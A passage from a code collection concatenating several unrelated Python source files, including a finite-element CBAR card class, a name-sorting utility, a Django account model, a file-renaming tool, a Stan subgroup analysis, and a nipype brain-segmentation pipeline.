                         double_or_blank(card, 16, 'w3b', 0.0),]
        assert len(card) <= 17, 'len(CBAR card) = %i\ncard=%s' % (len(card), card)
        self.i += 1

    def build(self):
        """Sort all arrays by element id and verify ids are unique."""
        if self.n:
            i = self.element_id.argsort()
            self.element_id = self.element_id[i]
            self.property_id = self.property_id[i]
            self.node_ids = self.node_ids[i, :]

            self.is_g0 = self.is_g0[i]
            self.g0 = self.g0[i]
            self.x = self.x[i, :]

            self.offt = self.offt[i]
            self.pin_flags = self.pin_flags[i, :]
            self.wa = self.wa[i, :]
            self.wb = self.wb[i, :]

            unique_eids = unique(self.element_id)
            if len(unique_eids) != len(self.element_id):
                raise RuntimeError('There are duplicate CBAR IDs...')
            self._cards = []
        else:
            self.element_id = array([], dtype='int32')
            self.property_id = array([], dtype='int32')

    def update(self, maps):
        """
        Renumber element/property/node ids using the provided maps.

        maps = {
            'node_id' : nid_map,
            'property' : pid_map,
        }
        """
        if self.n:
            eid_map = maps['element']
            nid_map = maps['node']
            pid_map = maps['property']
            for i, (eid, pid, nids) in enumerate(zip(self.element_id, self.property_id,
                                                     self.node_ids)):
                self.element_id[i] = eid_map[eid]
                self.property_id[i] = pid_map[pid]
                self.node_ids[i, 0] = nid_map[nids[0]]
                self.node_ids[i, 1] = nid_map[nids[1]]

    #=========================================================================
    def get_mass_by_element_id(self, grid_cid0=None, total=False):
        """
        mass = rho * A * L + nsm
        """
        if self.n == 0:
            return 0.0
        # NOTE(review): the unconditional return below deliberately disables
        # the mass computation that follows (it appears to be an unfinished
        # implementation) -- confirm before removing.
        return [0.0]
        if grid_cid0 is None:
            grid_cid0 = self.model.grid.get_position_by_node_index()
        p1 = grid_cid0[self.node_ids[:, 0]]
        p2 = grid_cid0[self.node_ids[:, 1]]
        L = p2 - p1
        i = self.model.properties_bar.get_index(self.property_id)
        A = self.model.properties_bar.get_Area[i]
        material_id = self.model.properties_bar.material_id[i]

        rho, E, J = self.model.Materials.get_rho_E_J(material_id)
        rho = self.model.Materials.get_rho(self.mid)
        E = self.model.Materials.get_E(self.mid)
        J = self.model.Materials.get_J(self.mid)

        mass = norm(L, axis=1) * A * rho + self.nsm
        if total:
            return mass.sum()
        else:
            return mass

    #=========================================================================
    def write_card(self, bdf_file, size=8, element_ids=None):
        """Write the selected (or all) CBAR cards to ``bdf_file``."""
        if self.n:
            if element_ids is None:
                i = arange(self.n)
            else:
                # BUG FIX: the requested ids must be located in the sorted
                # element_id array; the original searched for element_id in
                # itself, ignoring the element_ids argument entirely
                i = searchsorted(self.element_id, element_ids)

            for (eid, pid, n, is_g0, g0, x, offt, pin, wa, wb) in zip(
                    self.element_id[i], self.property_id[i], self.node_ids[i],
                    self.is_g0[i], self.g0[i], self.x[i],
                    self.offt[i],
                    self.pin_flags[i], self.wa[i], self.wb[i]):

                pa = set_blank_if_default(pin[0], 0)
                pb = set_blank_if_default(pin[1], 0)

                w1a = set_blank_if_default(wa[0], 0.0)
                w2a = set_blank_if_default(wa[1], 0.0)
                w3a = set_blank_if_default(wa[2], 0.0)
                w1b = set_blank_if_default(wb[0], 0.0)
                w2b = set_blank_if_default(wb[1], 0.0)
                w3b = set_blank_if_default(wb[2], 0.0)
                x1 = g0 if is_g0 else x[0]
                x2 = 0 if is_g0 else x[1]
                x3 = 0 if is_g0 else x[2]
                offt = set_string8_blank_if_default(offt, 'GGG')
                card = ['CBAR', eid, pid, n[0], n[1], x1, x2, x3, offt,
                        pa, pb, w1a, w2a, w3a, w1b, w2b, w3b]
                if size == 8:
                    bdf_file.write(print_card_8(card))
                else:
                    bdf_file.write(print_card_16(card))

    def slice_by_index(self, i):
        """Return a new CBAR object containing only the rows selected by ``i``."""
        i = self._validate_slice(i)
        obj = CBAR(self.model)
        obj.n = len(i)
        #obj._cards = self._cards[i]
        #obj._comments = obj._comments[i]
        #obj.comments = obj.comments[i]
        obj.element_id = self.element_id[i]
        obj.property_id = self.property_id[i]
        obj.node_ids = self.node_ids[i, :]
        obj.is_g0 = self.is_g0[i]
        obj.g0 = self.g0[i]
        obj.x = self.x[i, :]
        obj.offt = self.offt[i]
        obj.pin_flags = self.pin_flags[i]
        obj.wa = self.wa[i]
        obj.wb = self.wb[i]
        return obj
#def get_stiffness_matrix(self, model, node_ids, index0s, fnorm=1.0):
#return K, dofs, n_ijv
| 2.203125 | 2 |
maya/2019/scripts/zen/sortBy.py | callumMccready/callummccready.github.io | 0 | 12757444 | from zen.isIterable import isIterable
def sortBy(*args, **keywords):
    """Order the elements of a selection according to a reference ordering.

    Accepts either ``sortBy(selection, reference)`` (extra positional
    arguments are ignored) or a single iterable of iterables
    ``sortBy((selection, ..., reference))``.  Elements of *selection* are
    returned in the order they appear in *reference*; elements absent from
    *reference* are appended afterwards in their original order.  The
    result has the type of *selection* (str -> str, tuple -> tuple,
    list -> list); dict input yields a list of keys.  Returns None when
    there is nothing to sort.
    """
    if len(args) == 1:
        if isIterable(args[0]) and len(args[0]) > 1:
            reference = list(args[0][-1])
            selection = list(args[0][0])
            container_type = type(args[0][0])
        else:
            return
    elif len(args) > 1:
        reference = list(args[-1])
        selection = list(args[0])
        container_type = type(args[0])
    else:
        # no arguments: nothing to sort (previously raised NameError)
        return
    # reference elements that belong to the selection, in reference order
    ordered = [item for item in reference if item in selection]
    # selection elements missing from the reference keep their own order
    leftovers = [item for item in selection if item not in ordered]
    if container_type is str:
        return ''.join(ordered) + ''.join(leftovers)
    if container_type is dict:
        # dict input degrades to a list of keys (historical behaviour)
        return ordered + leftovers
    try:
        # BUG FIX: the old `exec('sorted=...')` could not rebind locals in
        # Python 3, so e.g. tuple inputs silently came back as lists
        return container_type(ordered) + container_type(leftovers)
    except TypeError:
        # container cannot be rebuilt/concatenated (e.g. set): fall back
        return ordered + leftovers
| 3.328125 | 3 |
mtq/tests/__main__.py | Binstar/mtq | 2 | 12757445 | <filename>mtq/tests/__main__.py
'''
Created on Aug 5, 2013
@author: sean
'''
import unittest
from os.path import dirname
def main():
    """Discover and run the package test suite under coverage measurement."""
    import coverage

    omit_patterns = ['**/site-packages/**', '**/tests/**']
    cov = coverage.coverage()
    cov.start()
    suite = unittest.loader.TestLoader().discover(dirname(__file__))
    unittest.TextTestRunner().run(suite)
    cov.stop()
    # text summary on stdout plus a browsable HTML report
    cov.report(omit=omit_patterns)
    cov.html_report(omit=omit_patterns)


if __name__ == '__main__':
    main()
| 2.203125 | 2 |
django_server/accounts/models.py | forkcs/mycode | 0 | 12757446 | from django.contrib.auth import get_user_model
from django.db import models
User = get_user_model()

# (stored value, human-readable label) choices for Account.account_type
ACCOUNT_TYPES = (
    (1, 'Admin'),
    (2, 'Teacher'),
    (3, 'Student')
)


class Account(models.Model):
    """Profile data attached one-to-one to the authentication user."""

    class Meta:
        verbose_name = 'Account'
        verbose_name_plural = 'Accounts'

    user = models.OneToOneField(to=User, on_delete=models.CASCADE)
    account_type = models.PositiveSmallIntegerField(choices=ACCOUNT_TYPES)
    first_name = models.CharField(max_length=50)
    last_name = models.CharField(max_length=50)
    middle_name = models.CharField(max_length=50)
    birth_date = models.DateField()
    school_name = models.CharField(max_length=100)

    def __str__(self):
        # BUG FIX: names were concatenated with no separator ("JaneDoe")
        return self.first_name + ' ' + self.last_name
| 2.59375 | 3 |
src/main.py | N-z0/pyRenamer | 0 | 12757447 | #!/usr/bin/env python3
#coding: utf-8
### 1st line allows to execute this script by typing only its name in terminal, with no need to precede it with the python command
### 2nd line declaring source code charset should be not necessary but for exemple pydoc request it
__doc__ = "This is the program centerpiece,but need to be imported by other modules to be used"#information describing the purpose of this module
__status__ = "Development"#should be one of 'Prototype' 'Development' 'Production' 'Deprecated' 'Release'
__version__ = "3.0.0"# version number,date or about last modification made compared to the previous version
__license__ = "public domain"# ref to an official existing License
__date__ = "2017"#started creation date / year month day
__author__ = "N-zo <EMAIL>"#the creator origin of this prog,
__maintainer__ = "Nzo"#person who curently makes improvements, replacing the author
__credits__ = []#passed mainteners and any other helpers
__contact__ = "<EMAIL>"# current contact adress for more info about this file
### import the required modules
from commonz.convert import text
# ASCII control characters (bell, tabs, newlines, escape, ...) that must
# never appear in a file name
CONTROL_CHAR= '\x07\x0b\x09\x0a\x0d\x7f\x08\x1b\x0c\x1b'
# characters reserved by file systems / shells
SYSTEM_CHAR="/\:*<>|.~"
QUOTE_CHAR="'"
DOUBLE_QUOTE_CHAR='"'
# replacement characters used during normalization
SUBSTITUTE_SPACE='_'
SUBSTITUTE_DOT='-'
### Misc
#import random
#import string # chain of char manipulation
#import collections # provide alternatives specialized datatypes (dict, list, set, and tupl) ex: deque>list-like container with fast appends and pops on either end
#from collections import deque # storage de queue de données
#import urllib # open a URL the same way you open a local file
### asynchron
#import asyncio #provides the basic infrastructure for writing asynchronous programs.
#import threading # constructs higher-level threading interfaces
#import queue #when information must be exchanged safely between multiple threads.
#import signal #Set handlers for asynchronous events
#import select # is low level module,Users are encouraged to use the selectors module instead
#import selectors # built upon the select module,allows high-level I/O multiplexing
#import asyncio# built upon selectors
#import multiprocessing
class Main():
	"""Main application object: computes a cleaned-up file name from an
	original name, its extensions, and a configuration dictionary."""
	def __init__(self):
		"""initialization of the application (stateless; nothing to set up)"""
		pass
	
	def get_correct_name(self,old_name,old_ext_names,cfg,sp_char):
		"""Return the corrected list of name parts [base, ext1, ...].
		
		old_name: base file name (without extensions)
		old_ext_names: list of extension strings (without dots)
		cfg: configuration dict with keys "uncode", "ascii", "spaces",
		     "case", "strip", "merge", "eraze", "conv", "ext", "conv_ext"
		sp_char: substitute character used for forbidden characters
		"""
		#print(base_name,ext_names,max_ext)
		uncode=cfg["uncode"]
		ascii_only=cfg["ascii"]
		spaces=cfg["spaces"]
		case=cfg["case"]
		strip_list=cfg["strip"]
		merge_list=cfg["merge"]
		eraze_list=cfg["eraze"]
		convert_tabl=cfg["conv"]
		max_dots=cfg["ext"]
		convert_ext_tabl=cfg["conv_ext"]
		
		# limit the number of extensions, merging the surplus into the base
		names_list= self.undots(old_name,old_ext_names,max_dots)
		#print(names_list)
		
		names_qantum=len(names_list)
		for name_index in range(names_qantum) :
			name=None
			new_name=names_list[name_index]
			# URL-decoding is done once, before the fixed-point loop
			if uncode :
				new_name=self.uncode(new_name)
			# repeat the cleanup passes until the name stops changing
			# (order of passes matters: each pass can re-introduce work
			# for an earlier one, e.g. stripping after merging)
			while not new_name==name :
				name=new_name
				new_name=self.normalize(new_name,sp_char)
				if ascii_only :
					new_name=self.ascii(new_name)
				if not spaces :
					new_name=self.unspaces(new_name)
				if case!=0 :
					new_name=self.set_case(new_name,case)
				if strip_list!=() :
					new_name=self.strip(new_name,strip_list)
				if merge_list!=() :
					new_name=self.merge(new_name,merge_list)
				if eraze_list!=() :
					new_name=self.eraze(new_name,eraze_list)
				if convert_tabl!={} :
					new_name=self.convert(new_name,convert_tabl)
			names_list[name_index]=new_name
		
		# NOTE(review): range(1, names_qantum-1) excludes the LAST entry,
		# so with exactly one extension conv_ext never applies; verify
		# whether range(1, names_qantum) was intended
		if convert_ext_tabl and names_qantum>1 :
			for ext_index in range(1,names_qantum-1) :
				ext_name=names_list[ext_index]
				new_ext_name=self.convert(ext_name,convert_ext_tabl)
				names_list[ext_index]=new_ext_name
		
		return names_list
	
	def undots(self,base_name,ext_names,max_ext):
		"""allow a certain number of .ext and merge the others
		
		max_ext: -1 keeps all extensions, 0 merges all of them into the
		base name, N keeps the last N and merges the rest (joined with
		SUBSTITUTE_DOT). Returns [base, ext...].
		"""
		#print(base_name,ext_names,max_ext)
		ext_quantum=len(ext_names)
		if ext_quantum==0 :
			return [base_name]
		elif max_ext==-1 :
			return [base_name]+ext_names
		elif max_ext==0 :
			return [SUBSTITUTE_DOT.join([base_name]+ext_names)]
		else :
			if ext_quantum>max_ext :
				base_name=SUBSTITUTE_DOT.join([base_name]+ext_names[:0-max_ext])
				ext_names=ext_names[0-max_ext:]
				return [base_name]+ext_names
			else :
				return [base_name]+ext_names
	
	def uncode(self,name):
		"""decode URL special characters (percent-encoding)"""
		return text.decode_url(name)
	
	def ascii(self,name):
		"""Replace special accented characters by their closest ASCII equivalents"""
		return text.to_ascii(name)
	
	def unspaces(self,name):
		"""replace blank spaces by the SUBSTITUTE_SPACE character"""
		name=name.replace(' ',SUBSTITUTE_SPACE)
		return name
	
	def set_case(self,name,change):
		"""switch characters case (1=upper,-1=lower,0=no change)"""
		if change>0 :
			new_name=name.upper()
		elif change<0 :
			new_name=name.lower()
		else :
			new_name=name
		return new_name
	
	def strip(self,name,strip_list):
		"""delete the specified characters if name begins or ends with them
		(repeated until the name is stable)"""
		new_name=name
		while True :
			for s in strip_list :
				new_name=new_name.strip(s)
			if name==new_name :
				break
			else :
				name=new_name
		return new_name
	
	def merge(self,name,merge_list):
		"""collapse consecutive duplicates of the specified characters
		(repeated until the name is stable)"""
		new_name=name
		while True :
			for s in merge_list:
				new_name=new_name.replace(s+s,s)
			if name==new_name :
				break
			else :
				name=new_name
		return new_name
	
	def eraze(self,name,eraze_list):
		"""remove all occurrences of the specified characters
		(repeated until the name is stable)"""
		new_name=name
		while True :
			for s in eraze_list :
				new_name=new_name.replace(s,'')
			if name==new_name :
				break
			else :
				name=new_name
		return new_name
	
	def convert(self,name,convert_tabl):
		"""convert specific characters to replacements; convert_tabl maps
		each replacement to the sequence of characters it substitutes
		(repeated until the name is stable)"""
		new_name=name
		while True :
			for n in convert_tabl :
				for o in convert_tabl[n] :
					new_name=new_name.replace(o,n)
			if name==new_name :
				break
			else :
				name=new_name
		return new_name
	
	def normalize(self,name,sp_char):
		"""substitute control/system/quote characters with sp_char"""
		bad_chars=CONTROL_CHAR+SYSTEM_CHAR+QUOTE_CHAR+DOUBLE_QUOTE_CHAR
		for c in bad_chars :
			name=name.replace(c,sp_char)
		#print(name)
		return name
| 2 | 2 |
src/subgroup_analysis.py | volkale/advr | 0 | 12757448 | <filename>src/subgroup_analysis.py
import arviz as az
import numpy as np
import os
import pystan
import matplotlib.pyplot as plt
from lib.stan_utils import compile_model, get_pickle_filename, get_model_code
from lib.drug_classes import DRUG_CLASSES
from prepare_data import get_formatted_data, add_rank_column, aggregate_treatment_arms, get_variability_effect_sizes
# set path to stan model files:
#   dir_name         = directory containing this module
#   parent_dir_name  = repository root (used for the output/ directory)
#   stan_model_path  = where the .stan model sources live
dir_name = os.path.dirname(os.path.abspath(__file__))
parent_dir_name = os.path.dirname(dir_name)
stan_model_path = os.path.join(dir_name, 'stan_models')
def get_data_dict(df, effect_statistic):
    """Build the input dictionary for the Stan measurement-error model.

    One entry per study (ordered by study_id): the chosen variability
    effect size (Y), the mean effect size lnRR (X), and the measurement
    standard deviations of both.
    """
    grouped = df.groupby('study_id')

    def per_study(column):
        # first value of `column` within each study, sorted by study_id
        return grouped[column].first().values

    effect = per_study(effect_statistic)
    return {
        'N': len(df['study_id'].unique()),
        'Y': effect,
        'Y_meas': effect,
        'X_meas': per_study('lnRR'),
        'SD_Y': np.sqrt(per_study('var_' + effect_statistic)),
        'SD_X': np.sqrt(per_study('var_lnRR')),
        'run_estimation': 1
    }
def get_subgroup_models():
    """Fit the 'remr' Stan model separately for each drug class.

    For every drug class, keeps only placebo-controlled studies of that
    class, computes variability effect sizes, samples the model with
    PyStan, and returns {drug_class: arviz.InferenceData}.
    """
    df = get_formatted_data()
    # drug class subgroup analysis
    model_res_dict = {}
    for drug_class in DRUG_CLASSES:
        # studies involving this drug class, restricted to its arms + placebo
        study_ids = df.query(f'drug_class == "{drug_class}"').study_id.unique()
        df_sub = df[(df.study_id.isin(study_ids)) & (df.drug_class.isin([drug_class, 'placebo']))].copy()
        # keep only studies that have BOTH an active and a placebo arm
        placebo_controlled_study_ids = set(df_sub.query('is_active == 1')['study_id']) \
            .intersection(df_sub.query('is_active == 0')['study_id'])
        df_sub = df_sub[df_sub.study_id.isin(placebo_controlled_study_ids)]
        for column in ['study_id', 'scale', 'drug_class']:
            df_sub = add_rank_column(df_sub, column)
        df_sub = aggregate_treatment_arms(df_sub)
        df_sub = get_variability_effect_sizes(df_sub)
        model = 'remr'
        stan_model = compile_model(
            os.path.join(stan_model_path, f'{model}.stan'),
            model_name=model
        )
        data_dict = get_data_dict(df_sub, 'lnVR')
        # fixed seed for reproducibility; high adapt_delta to avoid divergences
        fit = stan_model.sampling(
            data=data_dict,
            iter=4000,
            warmup=1000,
            chains=3,
            control={'adapt_delta': 0.99},
            check_hmc_diagnostics=True,
            seed=1
        )
        pystan.check_hmc_diagnostics(fit)
        data = az.from_pystan(
            posterior=fit,
            posterior_predictive=['Y_pred'],
            observed_data=['Y_meas', 'X_meas'],
            log_likelihood='log_lik',
        )
        model_res_dict[drug_class] = data
    return model_res_dict
def plot_model_comparison_CIs(model_res_dict):
    """Forest plot of the exp(mu) posterior per drug class, saved as TIFF.

    model_res_dict: {drug_class: arviz.InferenceData} as produced by
    get_subgroup_models().
    """
    fig, axis = plt.subplots(nrows=1)
    posterior_datasets = []
    for drug_class in DRUG_CLASSES:
        mu_samples = model_res_dict[drug_class].posterior.mu.values
        posterior_datasets.append(
            az.convert_to_dataset({drug_class: np.exp(mu_samples)})
        )
    _ = az.plot_forest(
        posterior_datasets,
        combined=True,
        credible_interval=0.95,
        quartiles=True,
        colors='black',
        var_names=DRUG_CLASSES,
        model_names=['', '', '', ''],
        ax=axis
    )
    axis.set_title('95% HDI $e^\\mu$')
    plt.tight_layout()
    plt.savefig(os.path.join(parent_dir_name, f'output/hdi_drug_class_comparison.tiff'), format='tiff', dpi=500,
                bbox_inches="tight")
    return plt
| 2.359375 | 2 |
ai/corrections/ml_d06/Dataset.py | PoCFrance/security-pool-2018 | 8 | 12757449 | import re
import math
class Exemple:
    """A single training example: input values and expected output values."""

    def __init__(self):
        self.inputs = []   # feature values
        self.outputs = []  # expected output values


class Dataset:
    """Loads a whitespace-separated dataset file.

    File layout::

        nb_exemple nb_input nb_output
        <nb_input floats>      (inputs of example 1)
        <nb_output floats>     (expected outputs of example 1)
        ...repeated nb_exemple times

    Raises ValueError("Cannot open dataset") when the file cannot be opened.
    """

    def __init__(self, filename):
        try:
            file = open(filename, "r")
        except OSError:
            # narrowed from a bare `except:` which also hid unrelated errors
            raise ValueError("Cannot open dataset")
        # `with` guarantees the file is closed even if parsing raises
        # (the original leaked the handle on a parse error)
        with file:
            # header: nb exemples, inputs and outputs
            header = [int(x) for x in file.readline().split()]
            self.nb_exemple = header[0]
            self.nb_input = header[1]
            self.nb_output = header[2]
            self.exemples = []
            for _ in range(self.nb_exemple):  # read each exemple (2 lines)
                inputline = file.readline()
                outputline = file.readline()
                self.loadData(inputline, outputline)

    def loadData(self, inputline, outputline):
        """Append a new example built from one input line and one output line."""
        ex = Exemple()
        ex.inputs.extend(float(x) for x in inputline.split())
        ex.outputs.extend(float(x) for x in outputline.split())
        self.exemples.append(ex)

    def computeMean(self, index):
        """Mean of input feature `index` over all examples."""
        return sum(ex.inputs[index] for ex in self.exemples) / len(self.exemples)

    def computeStandardDev(self, index, mean):
        """Population standard deviation of input feature `index`."""
        variance = sum((ex.inputs[index] - mean) ** 2 for ex in self.exemples)
        return math.sqrt(variance / len(self.exemples))

    def normalize(self):
        """Standardize every input feature in place (zero mean, unit variance)."""
        for index in range(len(self.exemples[0].inputs)):
            mean = self.computeMean(index)
            s = self.computeStandardDev(index, mean)
            for ex in self.exemples:
                ex.inputs[index] = (ex.inputs[index] - mean) / s
| 3.453125 | 3 |
macapype/pipelines/surface.py | Macatools/macapype | 7 | 12757450 | <reponame>Macatools/macapype<filename>macapype/pipelines/surface.py
import nipype.interfaces.utility as niu
import nipype.pipeline.engine as pe
import nipype.interfaces.fsl as fsl
import nipype.interfaces.afni as afni
import nipype.interfaces.freesurfer as fs
import macapype.nodes.register as reg
from macapype.nodes.surface import Meshify, split_LR_mask
from macapype.utils.utils_nodes import parse_key, NodeParams
def _create_split_hemi_pipe(params, params_template, name="split_hemi_pipe"):
    """Description: Split segmented tissues by hemisphere after \
removal of the cerebellum

    Processing steps:

    - warp/align cerebellum and hemisphere template masks to subject space
    - mask the subject segmentation per hemisphere, remove the cerebellum
    - extract per-hemisphere GM and WM, plus the cerebellum, from the T1

    Params:

    - None so far

    Inputs:

        inputnode:

            warpinv_file:
                non-linear transformation (from NMT_subject_align)

            inv_transfo_file:
                inverse transformation

            aff_file:
                affine transformation file

            t1_ref_file:
                preprocessd T1

            segmented_file:
                from atropos segmentation, with all the tissues segmented

        arguments:

            params:
                dictionary of node sub-parameters (from a json file)

            name:
                pipeline name (default = "split_hemi_pipe")

    Outputs:

    """
    split_hemi_pipe = pe.Workflow(name=name)

    # creating inputnode
    inputnode = pe.Node(
        niu.IdentityInterface(fields=['warpinv_file',
                                      'inv_transfo_file',
                                      'aff_file',
                                      't1_ref_file',
                                      'segmented_file']),
        name='inputnode')

    # get values
    if "cereb_template" in params_template.keys():
        cereb_template_file = params_template["cereb_template"]

        # ### cereb
        # Binarize cerebellum
        bin_cereb = pe.Node(interface=fsl.UnaryMaths(), name='bin_cereb')
        bin_cereb.inputs.operation = "bin"

        bin_cereb.inputs.in_file = cereb_template_file

        # Warp cereb brainmask to subject space
        # (nearest-neighbour to keep the mask binary)
        warp_cereb = pe.Node(interface=reg.NwarpApplyPriors(),
                             name='warp_cereb')
        warp_cereb.inputs.in_file = cereb_template_file
        warp_cereb.inputs.out_file = cereb_template_file
        warp_cereb.inputs.interp = "NN"
        warp_cereb.inputs.args = "-overwrite"

        # the binarized mask replaces the static in_file set above
        split_hemi_pipe.connect(bin_cereb, 'out_file', warp_cereb, 'in_file')
        split_hemi_pipe.connect(inputnode, 'aff_file',
                                warp_cereb, 'master')
        split_hemi_pipe.connect(inputnode, 'warpinv_file', warp_cereb, "warp")

        # Align cereb template
        align_cereb = pe.Node(interface=afni.Allineate(), name='align_cereb')

        align_cereb.inputs.final_interpolation = "nearestneighbour"
        align_cereb.inputs.overwrite = True
        align_cereb.inputs.outputtype = "NIFTI_GZ"

        split_hemi_pipe.connect(warp_cereb, 'out_file',
                                align_cereb, "in_file")  # -source
        split_hemi_pipe.connect(inputnode, 't1_ref_file',
                                align_cereb, "reference")  # -base
        split_hemi_pipe.connect(inputnode, 'inv_transfo_file',
                                align_cereb, "in_matrix")  # -1Dmatrix_apply

    # hemisphere masks: either separate L/R templates, or one combined
    # LR template that is split below
    if "L_hemi_template" in params_template.keys() and \
            "R_hemi_template" in params_template.keys():

        L_hemi_template_file = params_template["L_hemi_template"]
        R_hemi_template_file = params_template["R_hemi_template"]

        # Warp L hemi template brainmask to subject space
        warp_L_hemi = pe.Node(interface=reg.NwarpApplyPriors(),
                              name='warp_L_hemi')
        warp_L_hemi.inputs.in_file = L_hemi_template_file
        warp_L_hemi.inputs.out_file = L_hemi_template_file
        warp_L_hemi.inputs.interp = "NN"
        warp_L_hemi.inputs.args = "-overwrite"

        split_hemi_pipe.connect(inputnode, 'aff_file',
                                warp_L_hemi, 'master')
        split_hemi_pipe.connect(inputnode, 'warpinv_file', warp_L_hemi, "warp")

        # Align L hemi template
        align_L_hemi = pe.Node(interface=afni.Allineate(), name='align_L_hemi')

        align_L_hemi.inputs.final_interpolation = "nearestneighbour"
        align_L_hemi.inputs.overwrite = True
        align_L_hemi.inputs.outputtype = "NIFTI_GZ"

        split_hemi_pipe.connect(warp_L_hemi, 'out_file',
                                align_L_hemi, "in_file")  # -source
        split_hemi_pipe.connect(inputnode, 't1_ref_file',
                                align_L_hemi, "reference")  # -base
        split_hemi_pipe.connect(inputnode, 'inv_transfo_file',
                                align_L_hemi, "in_matrix")  # -1Dmatrix_apply

        # Warp R hemi template brainmask to subject space
        warp_R_hemi = pe.Node(interface=reg.NwarpApplyPriors(),
                              name='warp_R_hemi')
        warp_R_hemi.inputs.in_file = R_hemi_template_file
        warp_R_hemi.inputs.out_file = R_hemi_template_file
        warp_R_hemi.inputs.interp = "NN"
        warp_R_hemi.inputs.args = "-overwrite"

        split_hemi_pipe.connect(inputnode, 'aff_file',
                                warp_R_hemi, 'master')
        split_hemi_pipe.connect(inputnode, 'warpinv_file', warp_R_hemi, "warp")

        # Align R hemi template
        align_R_hemi = pe.Node(interface=afni.Allineate(), name='align_R_hemi')

        align_R_hemi.inputs.final_interpolation = "nearestneighbour"
        align_R_hemi.inputs.overwrite = True
        align_R_hemi.inputs.outputtype = "NIFTI_GZ"

        split_hemi_pipe.connect(warp_R_hemi, 'out_file',
                                align_R_hemi, "in_file")  # -source
        split_hemi_pipe.connect(inputnode, 't1_ref_file',
                                align_R_hemi, "reference")  # -base
        split_hemi_pipe.connect(inputnode, 'inv_transfo_file',
                                align_R_hemi, "in_matrix")  # -1Dmatrix_apply

    elif "LR_hemi_template" in params_template.keys():

        LR_hemi_template_file = params_template["LR_hemi_template"]

        # Warp LR hemi template brainmask to subject space
        warp_LR_hemi = pe.Node(interface=reg.NwarpApplyPriors(),
                               name='warp_LR_hemi')
        warp_LR_hemi.inputs.in_file = LR_hemi_template_file
        warp_LR_hemi.inputs.out_file = LR_hemi_template_file
        warp_LR_hemi.inputs.interp = "NN"
        warp_LR_hemi.inputs.args = "-overwrite"

        split_hemi_pipe.connect(inputnode, 'aff_file',
                                warp_LR_hemi, 'master')
        split_hemi_pipe.connect(inputnode, 'warpinv_file',
                                warp_LR_hemi, "warp")

        # Align LR hemi template
        align_LR_hemi = pe.Node(interface=afni.Allineate(),
                                name='align_LR_hemi')

        align_LR_hemi.inputs.final_interpolation = "nearestneighbour"
        align_LR_hemi.inputs.overwrite = True
        align_LR_hemi.inputs.outputtype = "NIFTI_GZ"

        split_hemi_pipe.connect(warp_LR_hemi, 'out_file',
                                align_LR_hemi, "in_file")  # -source
        split_hemi_pipe.connect(inputnode, 't1_ref_file',
                                align_LR_hemi, "reference")  # -base
        split_hemi_pipe.connect(inputnode, 'inv_transfo_file',
                                align_LR_hemi, "in_matrix")  # -1Dmatrix_apply

        # split the combined mask into separate left/right masks
        split_LR = pe.Node(
            interface=niu.Function(
                input_names=["LR_mask_file"],
                output_names=["L_mask_file", "R_mask_file"],
                function=split_LR_mask),
            name="split_LR")

        split_hemi_pipe.connect(align_LR_hemi, "out_file",
                                split_LR, 'LR_mask_file')

    else:
        # NOTE(review): print + exit() in a library function kills the whole
        # process; consider raising an exception instead
        print("Error, could not find LR_hemi_template or L_hemi_template and \
            R_hemi_template, skipping")
        print(params_template.keys())
        exit()

    # Using LH and RH masks to obtain hemisphere segmentation masks
    # ('a*b/b' keeps a where the mask b is non-zero)
    calc_L_hemi = pe.Node(interface=afni.Calc(), name='calc_L_hemi')
    calc_L_hemi.inputs.expr = 'a*b/b'
    calc_L_hemi.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(inputnode, 'segmented_file',
                            calc_L_hemi, "in_file_a")

    if "LR_hemi_template" in params_template.keys():
        split_hemi_pipe.connect(split_LR, 'L_mask_file',
                                calc_L_hemi, "in_file_b")
    else:
        split_hemi_pipe.connect(align_L_hemi, 'out_file',
                                calc_L_hemi, "in_file_b")

    # R_hemi
    calc_R_hemi = pe.Node(interface=afni.Calc(),
                          name='calc_R_hemi')
    calc_R_hemi.inputs.expr = 'a*b/b'
    calc_R_hemi.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(inputnode, 'segmented_file',
                            calc_R_hemi, "in_file_a")

    if "LR_hemi_template" in params_template.keys():
        split_hemi_pipe.connect(split_LR, 'R_mask_file',
                                calc_R_hemi, "in_file_b")
    else:
        split_hemi_pipe.connect(align_R_hemi, 'out_file',
                                calc_R_hemi, "in_file_b")

    # remove cerebellum from left and right brain segmentations
    calc_nocb_L_hemi = pe.Node(interface=afni.Calc(),
                               name='calc_nocb_L_hemi')
    calc_nocb_L_hemi.inputs.expr = '(a*(not (b)))'
    calc_nocb_L_hemi.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(calc_L_hemi, 'out_file',
                            calc_nocb_L_hemi, "in_file_a")
    split_hemi_pipe.connect(align_cereb, 'out_file',
                            calc_nocb_L_hemi, "in_file_b")

    calc_nocb_R_hemi = pe.Node(interface=afni.Calc(),
                               name='calc_nocb_R_hemi')
    calc_nocb_R_hemi.inputs.expr = '(a*(not (b)))'
    calc_nocb_R_hemi.inputs.outputtype = 'NIFTI_GZ'
    split_hemi_pipe.connect(calc_R_hemi, 'out_file',
                            calc_nocb_R_hemi, "in_file_a")
    split_hemi_pipe.connect(align_cereb, 'out_file',
                            calc_nocb_R_hemi, "in_file_b")

    # create L/R GM and WM no-cerebellum masks from subject brain segmentation
    # (in the atropos segmentation used here, label 2 = GM and label 3 = WM)
    calc_GM_nocb_L_hemi = pe.Node(interface=afni.Calc(),
                                  name='calc_GM_nocb_L_hemi')
    calc_GM_nocb_L_hemi.inputs.expr = 'iszero(a-2)'
    calc_GM_nocb_L_hemi.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(calc_nocb_L_hemi, 'out_file',
                            calc_GM_nocb_L_hemi, "in_file_a")

    calc_WM_nocb_L_hemi = pe.Node(interface=afni.Calc(),
                                  name='calc_WM_nocb_L_hemi')
    calc_WM_nocb_L_hemi.inputs.expr = 'iszero(a-3)'
    calc_WM_nocb_L_hemi.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(calc_nocb_L_hemi, 'out_file',
                            calc_WM_nocb_L_hemi, "in_file_a")

    calc_GM_nocb_R_hemi = pe.Node(interface=afni.Calc(),
                                  name='calc_GM_nocb_R_hemi')
    calc_GM_nocb_R_hemi.inputs.expr = 'iszero(a-2)'
    calc_GM_nocb_R_hemi.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(calc_nocb_R_hemi, 'out_file',
